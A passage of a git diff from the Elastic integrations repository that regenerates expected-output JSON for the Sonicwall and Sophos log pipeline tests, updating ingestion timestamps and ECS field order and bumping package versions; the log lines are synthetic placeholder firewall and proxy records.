"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=odi sn=ptass time=\"2018/03/11 02:28:49\" fw=10.39.10.155 pri=low c=tametcon m=157 HA packet processing error", "event": { - "ingested": "2021-06-09T13:23:15.703768300Z" + "ingested": "2021-12-14T14:54:38.699421988Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=aco sn=tio time=\"2018/03/25 09:31:24\" fw=10.112.38.219 pri=high c=dantium m=261 msg=\"lor\" n=velillu usr=cteturad src= 10.18.204.87 dst= 10.25.32.107", "event": { - "ingested": "2021-06-09T13:23:15.703773500Z" + "ingested": "2021-12-14T14:54:38.699422346Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=utodita sn=aec time=\"2018-4-8 4:33:58\" fw=10.21.89.175 pri=medium c=diconse m=428 msg=\"elitse\" n=reseo src=10.71.238.250:41:lo3856 dst=10.246.0.167:2189:eth2632 srcMac= 01:00:5e:7c:42:0b dstMac=01:00:5e:2c:22:06 proto=icmp fw_action=\"block\"", "event": { - "ingested": "2021-06-09T13:23:15.703778200Z" + "ingested": "2021-12-14T14:54:38.699422744Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ritin sn=temporin time=\"2018-4-22 11:36:32\" fw=10.122.76.148 pri=high c=tdol m=794 msg=\"upt\" sid=mex spycat=tatem spypri=untutlab pktdatId=amcor n=ica src=10.13.66.97:2000:enp0s5411 dst=10.176.209.227:6362:eth7037 proto=ipv6/siu fw_action=\"allow\"", "event": { - "ingested": "2021-06-09T13:23:15.703782400Z" + "ingested": "2021-12-14T14:54:38.699423109Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=quaea sn=ametcons time=\"2018/05/07 06:39:06\" fw=10.74.46.22 pri=very-high c=tetur m=7 Log full; deactivating SonicWALL", "event": { - "ingested": "2021-06-09T13:23:15.703786600Z" + "ingested": "2021-12-14T14:54:38.699423466Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ariatur sn=rer time=\"2018/05/21 13:41:41\" fw=10.210.243.175 pri=low c=atisetqu m=240 msg=\"issuscip\" n=uisa src=10.240.49.224 dst=10.77.174.205", "event": { - "ingested": "2021-06-09T13:23:15.703790500Z" + "ingested": "2021-12-14T14:54:38.699423835Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=luptatem sn=uaeratv time=\"2018/06/04 20:44:15\" fw=10.240.190.136 pri=medium c=atcupid m=255 msg=\"quamnih\" n=dminima src=10.44.150.31 dst=10.187.210.173", "event": { - "ingested": "2021-06-09T13:23:15.703794300Z" + "ingested": "2021-12-14T14:54:38.699424196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ntutlabo sn=iusmodte time=\"2018-6-19 3:46:49\" fw=10.108.84.24 pri=low c=iosamnis m=606 msg=\"volupt\" n=rem src=10.113.100.237:3887:eth163 dst=10.251.248.228:6909 srcMac= 01:00:5e:8b:c1:b4 dstMac=01:00:5e:c3:ed:55proto=udp fw_action=\"deny\"", "event": { - "ingested": "2021-06-09T13:23:15.703797800Z" + "ingested": "2021-12-14T14:54:38.699424556Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=emvele sn=isnost time=\"2018/07/03 10:49:23\" fw=10.71.112.159 pri=medium c=emqu m=28 Fragmented Packet Dropped", "event": { - "ingested": "2021-06-09T13:23:15.703801800Z" + "ingested": "2021-12-14T14:54:38.699424990Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sit id=rumSect sn=ita time=\"2018/07/17 17:51:58\" fw=10.139.65.241 pri=low c=teni m=61 Diagnostic Code E", "event": { - "ingested": "2021-06-09T13:23:15.703806600Z" + "ingested": "2021-12-14T14:54:38.699425349Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oremag id=illu sn=ruredo time=\"2018/08/01 00:54:32\" fw=10.72.196.74 pri=very-high c=ptassita m=906 msg=\"its\" n=lore", "event": { - "ingested": "2021-06-09T13:23:15.703811100Z" + "ingested": "2021-12-14T14:54:38.699425707Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sBono id=loremqu sn=tetur time=\"2018/08/15 07:57:06\" fw=10.213.94.135 pri=very-high c=urmagn m=237 msg=\"block\" n=uptat src=10.105.46.101:3346:enp0s382 dst= 10.50.44.5:7668:lo1441", "event": { - "ingested": "2021-06-09T13:23:15.703815Z" + "ingested": "2021-12-14T14:54:38.699426071Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ddoeius sn=ugiatn time=\"2018/08/29 14:59:40\" fw=10.50.102.128 pri=high c=abore m=328 msg=\"squ\" n=uiadol src=10.60.142.127:1081:eth6291 dst= 10.52.248.251:5776:lo2241", "event": { - "ingested": "2021-06-09T13:23:15.703818900Z" + "ingested": "2021-12-14T14:54:38.699426439Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=onu sn=liquaUte time=\"2018/09/12 22:02:15\" fw=10.137.202.243 pri=high c=tempor m=134 PPPoE starting PAP Authentication", "event": { - "ingested": "2021-06-09T13:23:15.703822700Z" + "ingested": "2021-12-14T14:54:38.699426795Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=mveniamq sn=taedict time=\"2018-9-27 5:04:49\" fw=10.206.69.135 pri=high c=aturve m=880 msg=\"utfug\" n=aturQu note=\"aaliq\" fw_action=\"allow\"", "event": { - "ingested": "2021-06-09T13:23:15.703826500Z" + "ingested": "2021-12-14T14:54:38.699427206Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=uiinea sn=mnisiut time=\"2018/10/11 12:07:23\" fw=10.208.228.129 pri=low c=olup m=441 msg=\"labor\" n=dol src= 10.240.54.28 dst= 10.115.38.80", "event": { - "ingested": "2021-06-09T13:23:15.703830100Z" + "ingested": "2021-12-14T14:54:38.699427563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=mve sn=uia time=\"2018/10/25 19:09:57\" fw=10.92.237.93 pri=high c=nsequunt m=163 Disconnecting PPPoE due to traffic timeout", "event": { - "ingested": "2021-06-09T13:23:15.703833800Z" + "ingested": "2021-12-14T14:54:38.699427920Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=doei sn=cipitl time=\"2018/11/09 02:12:32\" fw=10.53.127.17 pri=very-high c=strumex m=252 msg=\"eprehend\" n=asnu src=10.102.166.19 dst=10.104.49.142", "event": { - "ingested": "2021-06-09T13:23:15.703837600Z" + "ingested": "2021-12-14T14:54:38.699428272Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=repreh sn=plic time=\"2018/11/23 09:15:06\" fw=10.17.87.79 pri=high c=saq m=199 msg=\"block\" n=ritqu src=10.203.77.154:3916:lo4991 dst= 10.120.25.169:1965:lo4527", "event": { - "ingested": "2021-06-09T13:23:15.703841300Z" + "ingested": "2021-12-14T14:54:38.699428628Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ipsa id=asuntexp sn=adminim time=\"2018/12/07 16:17:40\" fw=10.115.115.26 pri=high c=modoc m=88 IKE Responder: IPSec proposal not acceptable", "event": { - "ingested": "2021-06-09T13:23:15.703844900Z" + "ingested": "2021-12-14T14:54:38.699428974Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=iumt sn=tsed time=\"2018/12/21 23:20:14\" fw=10.249.120.78 pri=medium c=atuse m=34 Login screen timed out", "event": { - "ingested": "2021-06-09T13:23:15.703848900Z" + "ingested": "2021-12-14T14:54:38.699429451Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=loremag sn=tcu time=\"2019/01/05 06:22:49\" fw=10.84.251.253 pri=high c=erspi m=195 msg=\"rorsit\" n=tionemu src=10.77.95.12 dst=10.137.217.159 sport=2310 dport=563 rcvd=1629", "event": { - "ingested": "2021-06-09T13:23:15.703852600Z" + "ingested": "2021-12-14T14:54:38.699429828Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "elillum id=upt sn=rnat time=\"2019/01/19 13:25:23\" fw=10.1.96.93 pri=high c=edolo m=48 Out-of-order command packet dropped", "event": { - "ingested": "2021-06-09T13:23:15.703856400Z" + "ingested": "2021-12-14T14:54:38.699430188Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "doeiu id=deF sn=itempo time=\"2019/02/02 20:27:57\" fw=10.200.237.196 pri=medium c=ecillum m=995 msg=\"isci\" n=dolor src=10.165.48.224:5386 dst=10.191.242.168:5251 note=\"equep\"", "event": { - "ingested": "2021-06-09T13:23:15.703860100Z" + "ingested": "2021-12-14T14:54:38.699430548Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BCS id=qui sn=ugiatquo time=\"2019/02/17 03:30:32\" fw=10.204.133.116 pri=medium c=autemv m=909 msg=\"emq\" n=plicaboN", "event": { - "ingested": "2021-06-09T13:23:15.703863800Z" + "ingested": "2021-12-14T14:54:38.699430923Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=vol sn=admi time=\"2019/03/03 10:33:06\" fw=10.77.229.168 pri=high c=aquiof m=178 msg=\"ende\" n=abor src=10.185.37.32:708 dst=10.116.173.79:7693", "event": { - "ingested": "2021-06-09T13:23:15.703867500Z" + "ingested": "2021-12-14T14:54:38.699431286Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=olorem sn=gitse time=\"2019/03/17 17:35:40\" fw=10.245.127.213 pri=very-high c=billoinv m=995 msg=\"sci\" n=col src=10.219.42.212:5708 dst=10.57.85.98:3286 note=\"mquisno\"", "event": { - "ingested": "2021-06-09T13:23:15.703871200Z" + "ingested": "2021-12-14T14:54:38.699431635Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=nisiu sn=imad time=\"2019/04/01 00:38:14\" fw=10.30.101.79 pri=high c=tenimad m=97 n=sitametc src= 10.152.35.175:2737:enp0s3423 dst= 10.88.244.209:6953:enp0s2460 proto=ipv6-icmp op=caecat sent=5835 dstname=tquidol", "event": { - "ingested": "2021-06-09T13:23:15.703874900Z" + "ingested": "2021-12-14T14:54:38.699431987Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "undeom id=emullamc sn=tec time=\"2019/04/15 07:40:49\" fw=10.29.118.7 pri=medium c=mveleum m=537 msg=\"accept\" f=exercita n=sBonorum src= 10.132.171.15 dst= 10.107.216.138:3147:lo5057:ugitsedq5067.internal.test proto=rdp sent=5943 rcvd=1635", "event": { - "ingested": "2021-06-09T13:23:15.703879100Z" + "ingested": "2021-12-14T14:54:38.699432333Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=gna sn=isiutali time=\"2019/04/29 14:43:23\" fw=10.156.152.182 pri=very-high c=ons m=137 Wan IP Changed", "event": { - "ingested": "2021-06-09T13:23:15.703883100Z" + "ingested": "2021-12-14T14:54:38.699432686Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=uaturve sn=amquisno time=\"2019/05/13 21:45:57\" fw=10.123.74.66 pri=very-high c=mquiad m=351 msg=\"CSe\" n=lors src=10.135.70.159 dst=10.195.223.82", "event": { - "ingested": "2021-06-09T13:23:15.703887100Z" + "ingested": "2021-12-14T14:54:38.699433082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=atu sn=iusm time=\"2019/05/28 04:48:31\" fw=10.20.81.176 pri=low c=stquido m=261 msg=\"rsitvolu\" n=mnisi usr=usmo src=10.22.244.71:1865:eth3249 dst= 10.142.120.198", "event": { - "ingested": "2021-06-09T13:23:15.703890900Z" + "ingested": "2021-12-14T14:54:38.699433443Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=oin sn=itseddoe time=\"2019/06/11 11:51:06\" fw=10.141.143.56 pri=low c=erc m=125 Unused AV log entry.", "event": { - "ingested": "2021-06-09T13:23:15.703894900Z" + "ingested": "2021-12-14T14:54:38.699433802Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=giatquov sn=olu time=\"2019/06/25 18:53:40\" fw=10.137.103.62 pri=medium c=serror m=105 Sending DHCP DISCOVER.", "event": { - "ingested": "2021-06-09T13:23:15.703898800Z" + "ingested": "2021-12-14T14:54:38.699434172Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "emagn id=emulla sn=mips time=\"2019/07/10 01:56:14\" fw=10.201.146.83 pri=very-high c=atnula m=34 Login screen timed out", "event": { - "ingested": "2021-06-09T13:23:15.703902700Z" + "ingested": "2021-12-14T14:54:38.699434533Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=itametc sn=ori time=\"2019/07/24 08:58:48\" fw=10.202.74.93 pri=low c=ido m=144 Primary firewall has transitioned to Idle", "event": { - "ingested": "2021-06-09T13:23:15.703906500Z" + "ingested": "2021-12-14T14:54:38.699434893Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=doconse sn=etdol time=\"2019/08/07 16:01:23\" fw=10.156.88.51 pri=high c=tura m=658 msg=\"osquirat\" n=equat src=10.56.10.84:5366 dst=10.12.54.142:6543", "event": { - "ingested": "2021-06-09T13:23:15.703910300Z" + "ingested": "2021-12-14T14:54:38.699435251Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=min sn=oluptat time=\"2019/08/21 23:03:57\" fw=10.162.129.196 pri=medium c=snisi m=195 msg=\"magnaal\" n=uscip src=10.222.169.140 dst=10.117.63.181 sport=5299 dport=6863 rcvd=7416", "event": { - "ingested": "2021-06-09T13:23:15.703914Z" + "ingested": "2021-12-14T14:54:38.699435607Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=eacommo sn=ueip time=\"2019/09/05 06:06:31\" fw=10.243.252.157 pri=low c=minim m=867 msg=\"scipi\" sess=tur n=acon", "event": { - "ingested": "2021-06-09T13:23:15.703918100Z" + "ingested": "2021-12-14T14:54:38.699435954Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "usm id=labori sn=porai time=\"2019/09/19 13:09:05\" fw=10.73.176.98 pri=high c=ostr m=60 Access to Proxy Server Blocked", "event": { - "ingested": "2021-06-09T13:23:15.703921800Z" + "ingested": "2021-12-14T14:54:38.699436307Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=lup sn=upta time=\"2019-10-3 8:11:40\" fw=10.247.88.138 pri=very-high c=orissu m=794 msg=\"fic\" sid=sBon spycat=usmod spypri=umdol pktdatId=rumexerc n=isiutali src=10.57.255.4:239:lo1325 dst=10.200.122.184:1176:eth5397 proto=rdp/amvo fw_action=\"allow\"", "event": { - "ingested": "2021-06-09T13:23:15.703926Z" + "ingested": "2021-12-14T14:54:38.699436657Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=mmod sn=iti time=\"2019/10/18 03:14:14\" fw=10.55.81.14 pri=medium c=asp m=19 Java blocked", "event": { - "ingested": "2021-06-09T13:23:15.703929800Z" + "ingested": "2021-12-14T14:54:38.699437022Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=mag sn=gelitse time=\"2019/11/01 10:16:48\" fw=10.195.58.44 pri=high c=radip m=413 msg=\"upta\" n=tetura src=10.206.229.61:3467 dst=10.129.101.147:3606", "event": { - "ingested": "2021-06-09T13:23:15.703933600Z" + "ingested": "2021-12-14T14:54:38.699437384Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=nostrud sn=cteturad time=\"2019/11/15 17:19:22\" fw=10.150.163.151 pri=high c=veniam m=159 Diagnostic Code F", "event": { - "ingested": "2021-06-09T13:23:15.703937200Z" + "ingested": "2021-12-14T14:54:38.699437766Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=imavenia sn=expli time=\"2019/11/30 00:21:57\" fw=10.144.57.239 pri=medium c=rur m=520 msg=\"itse\" n=ilm src=10.167.9.200:4003:lo5561 dst= 10.119.4.120:3822:enp0s234", "event": { - "ingested": "2021-06-09T13:23:15.703941100Z" + "ingested": "2021-12-14T14:54:38.699438124Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oluptate id=lit sn=santi time=\"2019/12/14 07:24:31\" fw=10.211.112.194 pri=low c=uis m=1079 msg=\"Clientamcis assigned IP:10.221.220.148\" n=apar", "event": { - "ingested": "2021-06-09T13:23:15.703945Z" + "ingested": "2021-12-14T14:54:38.699438510Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/sonicwall/manifest.yml b/packages/sonicwall/manifest.yml index 3efbf66144f..75ec565e4f5 100644 --- a/packages/sonicwall/manifest.yml +++ b/packages/sonicwall/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: sonicwall title: Sonicwall-FW Logs -version: 0.6.0 +version: 0.6.1 description: Collect logs from Sonicwall devices with Elastic Agent. categories: ["network", "security"] release: experimental diff --git a/packages/sophos/changelog.yml b/packages/sophos/changelog.yml index 6b684c00e56..b12bbf5a9c2 100644 --- a/packages/sophos/changelog.yml +++ b/packages/sophos/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.1.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json b/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json index 0674711607a..f961c361195 100644 --- a/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "2016:1:29-06:09:59 localhost.localdomain smtpd[905]: MASTER[nnumqua]: QR globally disabled, status one set to 'disabled'", "event": { - "ingested": "2021-12-09T13:44:53.093892Z" + "ingested": "2021-12-14T14:54:42.826905248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:2:12-13:12:33 astarosg_TVM[5716]: id=ommod severity=medium sys=inima sub=tlabo name=web request blocked, forbidden application detectedaction=accept method=ugiatnu client=stiae facility=nofdeF user=sunt srcip=10.57.170.140 dstip=10.213.231.72 version=1.5102 storage=emips ad_domain=imadmi object=ostrume class=molest type=upt attributes=uiineavocount=tisetq node=irati account=icistatuscode=giatquov cached=eritquii profile=dexeac filteraction=iscinge size=6992 request=oreseos url=https://mail.example.net/tati/utaliqu.html?iquaUten=santium#iciatisu referer=https://www5.example.org/eporroqu/uat.txt?atquovo=suntinc#xeac error=nidolo authtime=tatn dnstime=eli cattime=nnu avscantime=dolo fullreqtime=Loremip device=idolor auth=emeumfu ua=CSed exceptions=lupt group=psaquae category=oinBCSe categoryname=mnisist content-type=sedd reputation=uatD application=iunt app-id=temveleu reason=colabo filename=eme file=numqu extension=qui time=civeli function=block line=agnaali message=gnam fwrule=tat seq=ipitla initf=enp0s7281 outitf=enp0s7084 dstmac=01:00:5e:de:94:f6 srcmac=01:00:5e:1d:c1:c0 proto=den length=tutla tos=olorema prec=;iades ttl=siarchi srcport=2289 dstport=3920 tcpflags=mqu info=apariat prec=tlabore caller=untmolli engine=remi localip=saute host=ercit2385.internal.home extra=run server=10.47.202.102 cookie=quirat set-cookie=llu", "event": { - "ingested": "2021-12-09T13:44:53.093896500Z" + "ingested": "2021-12-14T14:54:42.826908163Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:2:26-20:15:08 eirure7587.internal.localhost reverseproxy: [mpori] [aaliquaU:medium] [pid 3905:lpaqui] (22)No form context found: [client sitame] No form context found when parsing iadese tag, referer: https://api.example.com/utla/utei.htm?oei=tlabori#oin", "event": { - "ingested": "2021-12-09T13:44:53.093900100Z" + "ingested": "2021-12-14T14:54:42.826908641Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:3:12-03:17:42 data4478.api.lan confd: id=iquipex severity=very-high sys=uradip sub=wri name=bor client=occa facility=stquidol user=itquiin srcip=10.106.239.55 version=1.3129 storage=atevel object=nsecte class=itame type=eumfug attributes=litcount=asun node=estia account=eaq", "event": { - "ingested": "2021-12-09T13:44:53.093906100Z" + "ingested": "2021-12-14T14:54:42.826909028Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:3:26-10:20:16 ctetura3009.www5.corp reverseproxy: [lita] [adeseru:medium] [pid 7692:eaq] amest configured -- corp normal operations", "event": { - "ingested": "2021-12-09T13:44:53.093910400Z" + "ingested": "2021-12-14T14:54:42.826909436Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:4:9-17:22:51 localhost smtpd[1411]: MASTER[inculpa]: QR globally disabled, status one set to 'disabled'", "event": { - "ingested": "2021-12-09T13:44:53.093951600Z" + "ingested": "2021-12-14T14:54:42.826909857Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:4:24-00:25:25 httpproxy[176]: [nse] disk_cache_zap (non) paquioff", "event": { - "ingested": "2021-12-09T13:44:53.093955200Z" + "ingested": "2021-12-14T14:54:42.826910239Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:5:8-07:27:59 ptasnu6684.mail.lan reverseproxy: [orumSe] [boree:low] [pid 945:rQuisau] AH01915: Init: (10.18.13.211:205) You configured ofdeFini(irat) on the onev(aturauto) port!", "event": { - "ingested": "2021-12-09T13:44:53.093958900Z" + "ingested": "2021-12-14T14:54:42.826910631Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:5:22-14:30:33 ssecillu7166.internal.lan barnyard: Initializing daemon mode", "event": { - "ingested": "2021-12-09T13:44:53.093963Z" + "ingested": "2021-12-14T14:54:42.826911018Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:6:5-21:33:08 ore5643.api.lan reverseproxy: [metco] [acom:high] [pid 2164:nim] ModSecurity: utaliqu compiled version=\"rsi\"; loaded version=\"taliqui\"", "event": { - "ingested": "2021-12-09T13:44:53.093967800Z" + "ingested": "2021-12-14T14:54:42.826911409Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:6:20-04:35:42 ciun39.localdomain reverseproxy: [iatqu] [inBCSedu:high] [pid 4006:rorsit] AH00098: pid file tionemu overwritten -- Unclean shutdown of previous Apache run?", "event": { - "ingested": "2021-12-09T13:44:53.093971900Z" + "ingested": "2021-12-14T14:54:42.826911808Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:7:4-11:38:16 atatnon6064.www.invalid reverseproxy: [magnid] [adol:low] [pid 1263:roide] AH00291: long lost child came home! (pid tem)", "event": { - "ingested": "2021-12-09T13:44:53.093977400Z" + "ingested": "2021-12-14T14:54:42.826912437Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:7:18-18:40:50 gitse2463.www5.invalid aua: id=tvolup severity=low sys=sci sub=col name=web request blocked srcip=10.42.252.243 user=agnaaliq caller=est engine=mquisno", "event": { - "ingested": "2021-12-09T13:44:53.093981400Z" + "ingested": "2021-12-14T14:54:42.826912831Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:8:2-01:43:25 httpproxy[2078]: [mol] sc_server_cmd (umdolors) decrypt failed", "event": { - "ingested": "2021-12-09T13:44:53.093986300Z" + "ingested": "2021-12-14T14:54:42.826913222Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:8:16-08:45:59 oriosam6277.mail.localdomain frox: Listening on 10.169.5.162:6676", "event": { - "ingested": "2021-12-09T13:44:53.093990300Z" + "ingested": "2021-12-14T14:54:42.826913612Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:8:30-15:48:33 ptate3830.internal.localhost reverseproxy: [quamqua] [ntut:high] [pid 5996:meum] AH02572: Failed to configure at least one certificate and key for mini:Loremip", "event": { - "ingested": "2021-12-09T13:44:53.093995100Z" + "ingested": "2021-12-14T14:54:42.826913997Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:9:13-22:51:07 nvo6105.invalid reverseproxy: [amquaer] [aqui:medium] [pid 3340:lpa] AH00020: Configuration Failed, isn", "event": { - "ingested": "2021-12-09T13:44:53.093999100Z" + "ingested": "2021-12-14T14:54:42.826914525Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:9:28-05:53:42 afcd[2492]: Classifier configuration reloaded successfully", "event": { - "ingested": "2021-12-09T13:44:53.094003900Z" + "ingested": "2021-12-14T14:54:42.826914922Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:10:12-12:56:16 edic2758.api.domain confd: id=olabori severity=medium sys=atatnon sub=lica name=secil client=uisnos facility=olores user=scipit srcip=10.54.169.175 version=1.5889 storage=onorumet object=ptatema class=eavolup type=ipsumq attributes=evitcount=tno node=iss account=taspe", "event": { - "ingested": "2021-12-09T13:44:53.094007900Z" + "ingested": "2021-12-14T14:54:42.826915336Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 